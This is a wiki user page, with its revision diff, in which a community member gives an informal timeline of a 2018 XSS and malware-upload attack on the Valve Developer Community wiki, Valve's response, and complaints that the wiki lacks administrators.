User:Pinsplash/Early July 2018 hacking incident: Difference between revisions
|  (Summary of everything I know so far. Feel free to add.) |  (noted SVG MP4) | ||
| Line 8: | Line 8: | ||
| *Whatever the images uploaded were, they didn't do anything. | *Whatever the images uploaded were, they didn't do anything. | ||
| *The 100,000 bytes of text uploaded was XSS scripts that failed due to the wiki software's fairly good security features. If the scripts worked, it would have been immediately obvious because viewing the page would have created many popup messages. We have found that SuicideJoy took that stuff straight from a YouTube video. | *The 100,000 bytes of text uploaded was XSS scripts that failed due to the wiki software's fairly good security features. If the scripts worked, it would have been immediately obvious because viewing the page would have created many popup messages. We have found that SuicideJoy took that stuff straight from a YouTube video. | ||
| *Seeing the scripts did not work, SuicideJoy blanked the page and then linked to an SVG on another domain ''(possibly a domain they owned. the URL was to some russian hacking website)''. This SVG had a JavaScript script embedded in it that would attempt to  | *Seeing the scripts did not work, SuicideJoy blanked the page and then linked to an SVG on another domain ''(possibly a domain they owned. the URL was to some russian hacking website)''. This SVG had a JavaScript script embedded in it that would attempt to load a webpage containing an infected MP4 that automatically plays. This MP4 would then send bitcoin-mining malware to a victim's computer. {{confirm|Did or did this not work?}} | ||
| At that moment, there was no ''site-wide'' threat. We started spreading word to other communities because it could have become worse, and it did. I sent an email to [[User:JeffLane]] a short time after first finding this activity. | At that moment, there was no ''site-wide'' threat. We started spreading word to other communities because it could have become worse, and it did. I sent an email to [[User:JeffLane]] a short time after first finding this activity. | ||
Revision as of 21:21, 5 July 2018
You have probably heard about the wiki recently having a hacker attack, or maybe you saw that maintenance message. Here's what's up:
June 24
User:Kendyhikaru attempts and fails to put an XSS script on Help:Contents. We did not raise hell about this cause it was an obvious failure. I know, like 500 people are going to think that was dumb but. chill.
Late June 3 night
I checked Special:RecentChanges and noticed User:SuicideJoy uploading a lot of suspicious content. Immediately I asked other people about this (personal wiki discord and Thinking With Portals) because this attack seemed a lot more legitimate. User:Ficool2 and many other people investigated on virtual machines, phones, etc.
- Whatever the images uploaded were, they didn't do anything.
- The 100,000 bytes of text uploaded was XSS scripts that failed due to the wiki software's fairly good security features. If the scripts worked, it would have been immediately obvious because viewing the page would have created many popup messages. We have found that SuicideJoy took that stuff straight from a YouTube video.
- Seeing the scripts did not work, SuicideJoy blanked the page and then linked to an SVG on another domain (possibly a domain they owned. the URL was to some russian hacking website). This SVG had a JavaScript script embedded in it that would attempt to load a webpage containing an infected MP4 that automatically plays. This MP4 would then send bitcoin-mining malware to a victim's computer.  Confirm:Did or did this not work? Confirm:Did or did this not work?
At that moment, there was no site-wide threat. We started spreading word to other communities because it could have become worse, and it did. I sent an email to User:JeffLane a short time after first finding this activity.
July 4
Early morning
As we started to realize that this threat was smaller than we initially thought, some of us were calling it safe. I was aware that many communities were still waiting for Valve to confirm to anybody that the wiki was safe, so I sent a more direct email to Valve's security personnel (security@valvesoftware.com).
Morning
About 45 minutes after me and others said it's safe, User:Valvedev (probably SuicideJoy on another account) started uploading random things, and this time we confirmed they had working XSS. I sent yet another email to security@valvesoftware.com telling them about this.
Late evening
Valve put a site-wide redirect to a page notifying that they were doing... "maintenance" to the wiki.
Night of July 5
Valve employee Gabe Van Engel (User:Gvengel) is seen blanking his user page. (
) Within 4 hours of that, the maintenance notice on the wiki was removed.
So far:
- MediaWiki software updated from 1.23.4 (a version considered OBSOLETE, released September 24, 2014) to 1.27.4 (a legacy version, released November 14, 2017)  Note:The most recent wiki version is 1.31. There is a 1.32 in alpha. Note:The most recent wiki version is 1.31. There is a 1.32 in alpha.
- Neither User:SuicideJoy nor User:Valvedev have been blocked from the site.
- I still haven't had word from anyone at Valve, and Engel is probably offline for the night.
- We still do not have direct 100% confirmation that the wiki is safe. (Personally I don't think there's a site-wide threat, just don't visit any suspicious-looking pages.)
Please actually give us something Valve. It seems even you guys are unsure if this site is worth any of our time right now.
We have (fuck knows how many) users, images, and pages that need to be blocked/deleted but never have. Until just tonight, the wiki has not had any sign of life from a sysop since May 2017. Let that sink in. The wiki has not been properly managed for over a year. (I made that clear in my email to Jeff Lane, by the way.)